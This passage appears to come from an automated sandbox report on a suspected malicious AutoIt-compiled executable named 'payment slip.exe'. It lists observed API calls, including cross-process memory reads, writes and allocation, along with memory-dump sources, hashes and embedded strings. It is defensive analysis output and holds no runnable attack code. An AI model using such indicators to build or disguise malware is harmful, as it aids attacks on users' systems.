                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                        • Instruction ID: a9b36616ba3d63a1ab6571c1687a4c181b5b75a3211bad356a382dd964123cb5
                                        • Opcode Fuzzy Hash: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                        • Instruction Fuzzy Hash: 1EF06D35200302EBFB215FA5EC49F963BADFF8A7A1F240414FE49C7250CA75D9508A60
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0324
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0331
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A033E
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A034B
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0358
                                        • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0365
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                        • Instruction ID: 9a2c29090ea236d730528d1b3bb72ad22ebd10bb307834cd5c0a2f0f84524784
                                        • Opcode Fuzzy Hash: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                        • Instruction Fuzzy Hash: BE01AE72800B199FCB30AFA6D880812FBF9BF613153158A3FD19652931C3B1AA58DF80
                                        APIs
                                        • _free.LIBCMT ref: 0006D752
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006D764
                                        • _free.LIBCMT ref: 0006D776
                                        • _free.LIBCMT ref: 0006D788
                                        • _free.LIBCMT ref: 0006D79A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                        • Instruction ID: 442dbe1b57ebc2cab997533cd15784fe20133d5ad86001c5f15452473495e133
                                        • Opcode Fuzzy Hash: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                        • Instruction Fuzzy Hash: A2F03632B48608AB9665EB64FAC6C6A77DFBB44750B940C0AF048D7902DB34FC80D675
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00095C58
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00095C6F
                                        • MessageBeep.USER32(00000000), ref: 00095C87
                                        • KillTimer.USER32(?,0000040A), ref: 00095CA3
                                        • EndDialog.USER32(?,00000001), ref: 00095CBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                        • Instruction ID: 68b5090b8fcbe92622c99bf0fc511a762244c68b25f6f8037231f53c7d8b98f0
                                        • Opcode Fuzzy Hash: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                        • Instruction Fuzzy Hash: 9E013170500B04AFFF325B11DE4EFEA77B8BB04B06F041659E687A15E1DBF4A9849B90
                                        APIs
                                        • _free.LIBCMT ref: 000622BE
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 000622D0
                                        • _free.LIBCMT ref: 000622E3
                                        • _free.LIBCMT ref: 000622F4
                                        • _free.LIBCMT ref: 00062305
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                        • Instruction ID: 7da6be415a42971f37a670a793cef530dc7628d51cc55d76547205bb65f483ba
                                        • Opcode Fuzzy Hash: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                        • Instruction Fuzzy Hash: F8F05470500915ABD717AF54BC02D5C3BA6F718B91B10050AF450D2A72CBB80891FFF5
                                        APIs
                                        • EndPath.GDI32(?), ref: 000495D4
                                        • StrokeAndFillPath.GDI32(?,?,000871F7,00000000,?,?,?), ref: 000495F0
                                        • SelectObject.GDI32(?,00000000), ref: 00049603
                                        • DeleteObject.GDI32 ref: 00049616
                                        • StrokePath.GDI32(?), ref: 00049631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                        • Instruction ID: 4851afddf3048a438f32eab2f3990a28817a2ddf5efb82bbafb328c6ac5764c4
                                        • Opcode Fuzzy Hash: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                        • Instruction Fuzzy Hash: 06F03C31005604EBEB265F65ED1CF653BA1BB09326F148224F4A9554F0C7B88991DF24
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __freea$_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 3432400110-3206640213
                                        • Opcode ID: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                        • Instruction ID: 0ace4c10c96b955b1b28b32b678f39c26b859a506bcd21b53c986151386ba351
                                        • Opcode Fuzzy Hash: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                        • Instruction Fuzzy Hash: 8FD10071900216DADB689F68C855BFEB7F3EF06300F2C4119E906ABB91D3759E81CB91
                                        APIs
                                          • Part of subcall function 00050242: EnterCriticalSection.KERNEL32(0010070C,00101884,?,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005024D
                                          • Part of subcall function 00050242: LeaveCriticalSection.KERNEL32(0010070C,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005028A
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                        • __Init_thread_footer.LIBCMT ref: 000B7BFB
                                          • Part of subcall function 000501F8: EnterCriticalSection.KERNEL32(0010070C,?,?,00048747,00102514), ref: 00050202
                                          • Part of subcall function 000501F8: LeaveCriticalSection.KERNEL32(0010070C,?,00048747,00102514), ref: 00050235
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                        • String ID: 5$G$Variable must be of type 'Object'.
                                        • API String ID: 535116098-3733170431
                                        • Opcode ID: 5b056afccd6888470c3c01e516f5c58d030cbe0949142020fa1b3a8f09147bc4
                                        • Instruction ID: e64870ae6b3bf2ca43812df4ef96a333d66422d7c23ce38967bc1f5ab3d41669
                                        • Opcode Fuzzy Hash: 5b056afccd6888470c3c01e516f5c58d030cbe0949142020fa1b3a8f09147bc4
                                        • Instruction Fuzzy Hash: F8917970A04209EFCB14EF94D891DEDBBB5EF89340F10805DF84AAB292DB71AE41CB51
                                        APIs
                                          • Part of subcall function 0009B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921D0,?,?,00000034,00000800,?,00000034), ref: 0009B42D
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00092760
                                          • Part of subcall function 0009B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0009B3F8
                                          • Part of subcall function 0009B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0009B355
                                          • Part of subcall function 0009B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B365
                                          • Part of subcall function 0009B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B37B
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000927CD
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0009281A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                        • Instruction ID: 66e4c8ac7fe0f92fb92e684bbb5319a726bc959b28b18c39a5c0319456f9602c
                                        • Opcode Fuzzy Hash: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                        • Instruction Fuzzy Hash: 4E411972900218BFDF10DBA4DD85EEEBBB8AF09710F108099FA55B7181DB706E45DBA1
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\payment slip.exe,00000104), ref: 00061769
                                        • _free.LIBCMT ref: 00061834
                                        • _free.LIBCMT ref: 0006183E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\payment slip.exe
                                        • API String ID: 2506810119-607663974
                                        • Opcode ID: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                        • Instruction ID: d759e7e0547068a1131b687cf17ee0cdf1a88bf9dede768b0f7a192b5721148e
                                        • Opcode Fuzzy Hash: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                        • Instruction Fuzzy Hash: D8316275A04218BFDB21DF99D885DDEBBFEEB85310F184166F805D7212DAB04E40CB90
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0009C306
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0009C34C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00101990,00E154F8), ref: 0009C395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                        • Instruction ID: e20c252a32469c43d68941a988db35a89456ce01c041f6417ae8c451ee044e54
                                        • Opcode Fuzzy Hash: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                        • Instruction Fuzzy Hash: 4B41C3716043019FEB20DF24D844F5ABBE8AF85320F00C61DF8A5972D2D770EA04DB52
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000CCC08,00000000,?,?,?,?), ref: 000C44AA
                                        • GetWindowLongW.USER32 ref: 000C44C7
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C44D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                        • Instruction ID: 336237b4f661781fafe78a2d68ddaf31ae817c733c7363b18ac0f1336989168b
                                        • Opcode Fuzzy Hash: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                        • Instruction Fuzzy Hash: 27318931210605AFEB658F38DC45FEA7BA9FB08324F204329F979921E1D774AC509B50
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 000C461F
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C4634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: U$'
                                        • API String ID: 3850602802-2019772650
                                        • Opcode ID: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                        • Instruction ID: fcd3c15875c043c34de3c0f0383feaec0971e2052c851aba169da72c3d1f6a4f
                                        • Opcode Fuzzy Hash: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                        • Instruction Fuzzy Hash: 59311774A006099FDB14CFA9C990FDE7BB5FB09300F10406AE904AB342D771A941CF90
                                        APIs
                                        • SysReAllocString.OLEAUT32(?,?), ref: 00096EED
                                        • VariantCopyInd.OLEAUT32(?,?), ref: 00096F08
                                        • VariantClear.OLEAUT32(?), ref: 00096F12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$AllocClearCopyString
                                        • String ID: *j
                                        • API String ID: 2173805711-743776685
                                        • Opcode ID: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                        • Instruction ID: 8cfcc243ad2ddfd282dbd93ff14ef09722ecb6e1f23c561fe849f7a2e53a0696
                                        • Opcode Fuzzy Hash: 5e25fe899bc25197b962d042141806cd4168299028e44f8eb10c29abbdebbfed
                                        • Instruction Fuzzy Hash: 8A319172604245DFDF19AFA4E8A19FD37B5FF85304F1004A9F9038B2A2C7359916EB90
                                        APIs
                                          • Part of subcall function 000B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,000B3077,?,?), ref: 000B3378
                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                        • _wcslen.LIBCMT ref: 000B309B
                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 000B3106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 946324512-2422070025
                                        • Opcode ID: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                        • Instruction ID: 127fe75fb20fe246c2b350602370887e5abc88330a9979ee3dae01aa58c5bd6d
                                        • Opcode Fuzzy Hash: 61bfd0a999dd0a42bb62ec8791d693d400f9e881bc6bc7c423663d20e74c3975
                                        • Instruction Fuzzy Hash: 8531F1396002019FDB20DF28C895EEA77E4EF14318F348559E9169B392DB72EE45CB60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 176396367-2734436370
                                        • Opcode ID: 908f1353ebb3ce898aebbcf5e48a2c16adc83b61b11ca7822df4186208235bb2
                                        • Instruction ID: 23c89aa448047508f0bd41acb430e7c70bff1c73c61a1c03b371959c9136cddf
                                        • Opcode Fuzzy Hash: 908f1353ebb3ce898aebbcf5e48a2c16adc83b61b11ca7822df4186208235bb2
                                        • Instruction Fuzzy Hash: 3221087210461166DB31AB2C9C06FFB73EC9F51310F15842EFD499B182EB91AD45E3D6
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000C3840
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000C3850
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000C3876
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                        • Instruction ID: d395cbe6f663a5f49a55d97b5dcb969ba84037de15fb957e6e1ce797427058ee
                                        • Opcode Fuzzy Hash: edeb58deb277bfd2ddd34762b0c4761348a37375a9b6705e23d049b26426e04c
                                        • Instruction Fuzzy Hash: 1A218072614218BBEB219F54DC85FBF37AEEF89750F11C118F9049B190CA75DC5187A0
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000A4A08
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000A4A5C
                                        • SetErrorMode.KERNEL32(00000000,?,?,000CCC08), ref: 000A4AD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
